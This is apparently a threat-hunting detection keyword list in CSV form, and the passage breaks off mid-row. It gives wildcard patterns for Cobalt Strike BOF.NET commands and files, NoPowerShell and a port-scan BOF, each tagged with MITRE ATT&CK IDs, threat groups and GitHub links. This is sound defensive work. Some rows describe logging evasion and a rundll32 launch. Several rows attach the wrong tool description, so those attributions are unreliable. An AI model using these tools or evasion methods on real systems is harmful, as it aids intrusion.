APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet.cna*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet.cna*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BOFNET.csproj*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOFNET.dll*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BOFNET.dll*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BOFNET.sln*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_boo *.boo*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_execute *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_execute *,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_execute.*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_execute.*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_execute.cpp.x64.obj*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_execute.cpp.x86.obj*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_init*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_job *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_jobkill*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_jobs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_jobstatus *,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_list*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_listassembiles*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_load *,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*bofnet_load *.*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet_shutdown*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOFNET_Tests*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofportscan *,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 